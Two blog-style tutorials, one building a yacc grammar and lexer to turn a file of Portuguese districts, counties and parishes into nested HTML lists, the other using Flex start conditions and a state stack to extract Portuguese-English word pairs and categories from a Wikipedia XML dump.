When I was studying yacc I noticed that there was not much information available, which is not something one would expect of a tool that is 40 years old. Unfortunately there was no quick introduction for someone who already knows the theory behind this kind of tool. As I said, yacc is a very old tool, made in the early days of compilers, before the whole theory of the area as we know it today existed. So it is normal that small errors turn into disasters that may take a long time to resolve.

This post is for those who already know what grammars, lexical analyzers and so on are, but have never touched Lex/yacc, or for those who are stuck with these things (I hope).

In this post I will explain Lex/yacc to you, with an example of a program that I wrote. I will not bore you with massive lines of code (like I usually do), because Lex/yacc is a simple tool to use. With just 60 lines of explained code you will see how great it is.

The problem

My idea was to make a simple site with all the information about all the cities in Portugal. Later I extended it to all the parishes (freguesia in Portuguese), counties (concelho in Portuguese) and districts (distrito in Portuguese) of Portugal and their relationships: a district has many counties and a county has many parishes.

Simple! What I needed now were the names of all the parishes, counties and districts of Portugal. I eventually found three files with all this information, and more, on the Portuguese post office company's website. Better yet, these files had the relationship between the divisions. I had to write a small program in C that takes those three files and creates a new file, which I use with Lex/yacc.

In order to have all the available information on each locality of Portugal I decided to use Wikipedia. This is the Achilles heel of the program, because unfortunately the Wikipedia entries on the Portuguese parishes are not uniform, and many parishes have no entry at all. But I was still able to get good results.

The structure of the new file generated is:

District1>WikipediaEntry_for_District1
        Parish1_of_Countie1>WikipediaEntry_for_Parish1_of_Countie1,
        Parish2_of_Countie1>WikipediaEntry_for_Parish2_of_Countie1,
        Parish3_of_Countie1>WikipediaEntry_for_Parish3_of_Countie1,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie1
        !Countie1>WikipediaEntry_for_Countie1;
        Parish1_of_Countie2>WikipediaEntry_for_Parish1_of_Countie2,
        Parish2_of_Countie2>WikipediaEntry_for_Parish2_of_Countie2,
        Parish3_of_Countie2>WikipediaEntry_for_Parish3_of_Countie2,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie2
        !Countie2>WikipediaEntry_for_Countie2;
                .
                .
                .
        !CountieN>WikipediaEntry_for_CountieN|

District2>WikipediaEntry_for_District2
        Parish1_of_Countie1>WikipediaEntry_for_Parish1_of_Countie1,
        Parish2_of_Countie1>WikipediaEntry_for_Parish2_of_Countie1,
        Parish3_of_Countie1>WikipediaEntry_for_Parish3_of_Countie1,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie1
        !Countie1>WikipediaEntry_for_Countie1;
        Parish1_of_Countie2>WikipediaEntry_for_Parish1_of_Countie2,
        Parish2_of_Countie2>WikipediaEntry_for_Parish2_of_Countie2,
        Parish3_of_Countie2>WikipediaEntry_for_Parish3_of_Countie2,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie2
        !Countie2>WikipediaEntry_for_Countie2;
                .
                .
                .
        !CountieN>WikipediaEntry_for_CountieN|
.
.
.

It has about 43000 lines, the number of parishes in Portugal.

Yacc

A yacc file, just like a lex file, is divided in three parts:

DECLARATIONS
%%
GRAMMAR
%%
FUNCTIONS

I will explain later on what to put in each of those three parts.

The solution

I started by writing the following grammar to describe my new file:

OrGeo     -> Districts

Districts -> District '|'
          | Districts District '|'

District  -> IdD Link Counties

Counties -> Countie
          | Counties ';' Countie

Countie  -> Parishes '!' IdC Link

Parishes    -> Parish
          | Parishes ',' Parish

Link      -> '>' l

IdD       -> id

IdC       -> id

Parish     -> IdL Link

IdL       -> id

As id is a name (of the district, county or parish), we will declare it in yacc as a pointer to chars (vals). To do that, we create a union in the first part of the yacc file (DECLARATIONS), and associate vals with id and l:

%union {
        char *vals;
}

%token <vals> id l

Yacc uses a union because you can declare as many associations as you want. We must refer to that union in the lex file as yylval.

This is the same as using:

%token <vals> id
%token <vals> l

We now go to the lex file and add the rules that the lexical analyzer will apply when it finds text:

[ a-zA-ZÀ-ú-'.()/'`0-9]+  { yylval.vals = strdup(yytext);
                                    return id; }
[a-zA-ZÀ-ú-'.()/'`0-9_:]+ { yylval.vals = strdup(yytext);
                                    return l; }

Here we are saying that when lex finds some text that matches that regular expression, it will return it to yacc as an id (or an l); that way we get the names of our cities, and the links.

As you can see we have special symbols in our grammar (!, >, ,, ;, |), so we need to tell lex to return them to yacc, where we need them:

[!>,;|]                           { return yytext[0]; }

I will also tell lex to ignore all \n and \t characters:

[\t\n]                            { ; }

Making our grammar powerful

Now our grammar will suffer some adjustments: we will tell yacc what to do when it reduces each derivation of a rule:

OrGeo     : Districts { d = $1; }
          ;
Districts : District '|' { $$ = $1; }
          | Districts District '|' { $$ = catDistricts($1,$2); }
          ;
District  : IdD Link Counties { $$ = addDistrict($1, $2, $3); }
          ;
Counties : Countie { $$ = $1; }
          | Counties ';' Countie { $$ = catCounties($1, $3); }
          ;
Countie  : Parishes '!' IdC Link { $$ = addCountie($1, $3, $4); }
          ;
Parishes    : Parish { $$ = $1; }
          | Parishes ',' Parish { $$ = catParishes($1, $3); }
          ;
Link      : '>' l { $$ = $2; }
          ;
IdD       : id { $$ = $1; }
          ;
IdC       : id { $$ = $1; }
          ;
Parish     : IdL Link { $$ = addParish($1, $2); }
          ;
IdL       : id { $$ = $1; }
          ;

Here we tell yacc how to behave when it passes through a certain derivation of a rule.
We can also tell yacc that a rule returns a given data type, for example:

%{
#include <stdio.h>
#include <stdlib.h>
#include "district.h"

District *d;
%}

%union {
        char *vals;
        Parish *valf;
        Countie *valc;
        District *vald;
}

%type <vals> Link IdL IdD IdC
%type <valf> Parish Parishes
%type <valc> Countie Counties
%type <vald> District Districts

To return something in a rule we refer to that rule as $$; for example, in

IdL       : id

$$ means IdL, and $1 refers to the id, and so on. So we can say $$ = $1, which means IdL = id.

The functions catDistricts, addDistrict, addParish, addCountie, catCounties and catParishes are just functions that create linked lists and append new elements to an already existing linked list.
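For illustration, here is a minimal sketch of what two of them could look like; the field names are assumptions, and the real definitions live in district.h:

#include <stdlib.h>

/* assumed shape of a Parish node; the real one is in district.h */
typedef struct parish {
        char *name;           /* the id from the grammar */
        char *link;           /* the Wikipedia link */
        struct parish *next;
} Parish;

/* Parish : IdL Link -- build a one-element list */
Parish *addParish(char *name, char *link) {
        Parish *p = (Parish *)malloc(sizeof(Parish));
        p->name = name;
        p->link = link;
        p->next = NULL;
        return p;
}

/* Parishes : Parishes ',' Parish -- append at the end of the list */
Parish *catParishes(Parish *list, Parish *p) {
        Parish *it = list;
        while (it->next != NULL)
                it = it->next;
        it->next = p;
        return list;
}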

The result is an HTML page with nested lists; here is the result.

Notes

All the code used here, including the code to generate the new file, is available here; feel free to use it.





Lexical analysis Wikipedia

13 04 2008

Intro

This year I started learning language processing. I started with regular expressions, and in the past few days I began to study Flex, since with regular expressions alone we can't create text filters.
The first job I did was a kind of dictionary: taking a source of words and a faithful translation, and gathering all the information in one document.

The problem was finding a good document with many Portuguese words and their translations into English.

With this post I want to teach what I learned from this work.

Wikipedia XML structure

I started by picking up the latest dump of the Portuguese Wikipedia and "deciphering" the XML in which it is stored. The structure is something like this:

<page>
    ...
</page>
<page>
    ...
</page>

And each page tag, expanded, has this structure:

<page>
    <title>TITLE</title>
    <id>PAGE_ID_NUMBER</id>
    <revision>
      <id>ID_REVISION_NUMBER</id>
      <timestamp>TIMESTAMP</timestamp>
      <contributor>
        <username>USERNAME</username>
        <id>ID_CONTRIBUTOR</id>
      </contributor>
      <comment>COMMENT</comment>
      <text xml:space="preserve">WIKIPEDIA_ENTRY</text>
    </revision>
  </page>

So, here we have the variables: TITLE, PAGE_ID_NUMBER, ID_REVISION_NUMBER, TIMESTAMP, USERNAME, ID_CONTRIBUTOR, COMMENT and WIKIPEDIA_ENTRY.

TITLE is the Portuguese word, because the Wikipedia dump I downloaded is the Portuguese one.
But so far, no English word.

Lets expand WIKIPEDIA_ENTRY:

<text xml:space="preserve">
    ...
    [[categoria:CATEGORY]]
    ...
    [[en:ENGLISH]]
    ...
</text>

Here we have the ENGLISH variable, which is the word in English corresponding to TITLE. I also want the CATEGORY variable, which indicates to which category this entry belongs.

As some entries in Wikipedia have multiple category lines, I am also interested in keeping them all.
I want the output of my program to be something like this:

PT - TITLE1
EN - ENGLISH1
Categoria - CATEGORY11
            CATEGORY12
            ...
            CATEGORY1j
...
PT - TITLEi
EN - ENGLISHi
Categoria - CATEGORYi1
            CATEGORYi2
            ...
            CATEGORYij
...

Some entries in the Portuguese Wikipedia do not have a corresponding English version, so I do not want those entries.

Lexing

A Lex file has this structure:

definitions
%%
rules
%%
user code

Let's focus on the rules part.

Rules have the following structure:

%%
REGEX    code
REGEX    code
%%

I know regular expressions (REGEX) now, so let's start building this thing!

I came to realize that the TITLE part may contain not only entry names: it also has the Wikipedia contributors' pages, among other things that I do not want to save.
I made a list of all those page prefixes:
{Wikipedia,Usuário,Discussão,Ajuda,Anexo,MediaWiki,Categoria}

So I have to somehow throw away all the pages with the following structure:

  <page>
    <title>["Wikipedia""Usuario""Discussao""Ajuda""Anexo""MediaWiki""Categoria"]:TITLE</title>
    <id>ID_PAGE</id>
    <revision>
      <id>ID_REVISION</id>
      <timestamp>TIMESTAMP</timestamp>
      <contributor>
        <username>USERNAME</username>
        <id>ID_CONTRIBUTOR</id>
      </contributor>
      <comment>COMMENT</comment>
      <text xml:space="preserve">ENTRY</text>
    </revision>
  </page>

After a dozen lines I began to understand that I had to somehow "explain" to Lex the structure of the Wikipedia XML file. That way it would be easier.

I started reading the Flex manual and found Start Conditions, a very clever way to treat a block of information.

Languages like C, HTML and XML are structured in blocks, so Start Conditions may be the way to easily get the information from them.

Start Conditions

If you have a block of text that looks like this:

<title>TITLE</title>

our block starts with the "<title>" string, then has a name (which I want) running until the '<' of the closing tag, and ends with the "</title>" string.

So in Lex, we must use Start Conditions and produce the following code:

%x title_sc
anything .|[\n\t\r]
%%
"<title>"            BEGIN(title_sc);
<title_sc>[^<]+      {printf("title=%s\n",yytext);}
<title_sc>"</title>" BEGIN(INITIAL);
{anything}           {;} /* do nothing*/
%%
main() {
        yylex();
}

The %x title_sc declaration declares an exclusive state; that means that while we are inside title_sc, Flex won't look at rules outside of it, until BEGIN(INITIAL).

In the definitions part we can declare variables, like anything .|[\n\t\r], to use in the rules part as {anything}.

The BEGIN(title_sc) statement makes Lex enter the title_sc state, where it starts matching the rules it finds there.

We can rewrite the above code like this:

%x title_sc
anything .|[\n\t\r]
%%
"<title>"            BEGIN(title_sc);
<title_sc>{
        [^<]+        {printf("title=%s\n",yytext);}
        "</title>"   BEGIN(INITIAL);
}
{anything}           {;} /* do nothing*/
%%
main() {
        yylex();
}

When Lex finds the BEGIN(INITIAL) statement it jumps back to the initial state, so it seems we could never use blocks inside other blocks (like XML does).

Of course that’s not true.

Start Conditions inside Start Conditions

Lex has a brilliant way to deal with that: it uses a stack to store the state we are in!

The idea is something like this; imagine a mathematical expression:

(1+2)-(3*(4/5))

I can say:

  • 2 is at path [1,2]
  • 3 is at path [2,1]
  • 5 is at path [2,2,2]
  • and so on…

It is all about keeping the path: our current position in the tree.

So now we replace BEGIN(state) with yy_push_state(state), and to go back to the previous block we call yy_pop_state().

With that, now I can read structures like this one:

  <page>
    <title>TITLE</title>
      ...
      <text xml:space="preserve">
        ...
        [[Categoria:CATEGORY]]
        ...
        [[en:ENGLISH]]
        ...
      </text>
  </page>

And to do so, I write that Lex code:

%x PAGE TITLE TEXT CATEGORIA EN
%option stack
anything .|[\n\t\r]
notPage ["Wikipedia""Usuário""Discussão""Ajuda""Anexo""MediaWiki""Categoria"]
%%
"<page>"                        yy_push_state(PAGE);
<PAGE>{
        "<title>"{notPagina}    yy_pop_state(); // not a valid page
        "<title>"               yy_push_state(TITLE);
        "<text"[^>]+">"         yy_push_state(TEXT);
        "</page>"               yy_pop_state();
        {anything}              /* do nothing */
}
 
<TEXT>{
        "[["[cC]"ategoria:"     yy_push_state(CATEGORIA);
        "[[en:"                 yy_push_state(EN);
        "</text>"               yy_pop_state();
        {anything}              /* do nothing */
}
 
<TITLE>{
        [^<]+                   {
                                        i=0;
                                        imprime(cat, pt, en); /* print the previous entry */
                                        limpa(cat);           /* clear the categories array */
                                        pt=NULL; en=NULL;
                                        pt=strdup(yytext);
                                }
        "</title>"              yy_pop_state();
        {anything}              /* do nothing */
}
 
<EN>{
        [^\]]+                  en=strdup(yytext);
        [\]]+                   yy_pop_state();
        "]"\n{anything}         /* do nothing */
}
 
<CATEGORIA>{
        [ \#\!\*\|]+            yy_pop_state();
        [^\]\|\n]+              {
                                        cat[i]=strdup(yytext);
                                        i++;
                                }
        [\]]+                   yy_pop_state();
        "]"\n{anything}         /* do nothing */
}
{anything}                      /* do nothing */
%%
int main() {
        yylex();
        return 0;
}

As you can see, we are constantly matching rules that make lex jump to another state, until a terminal rule (in this case, the variable assignments) or a pop.

To see all the code go here(.lex).

If you understand Portuguese and feel interested in more information you can go here(.html).

References

flex: The Fast Lexical Analyzer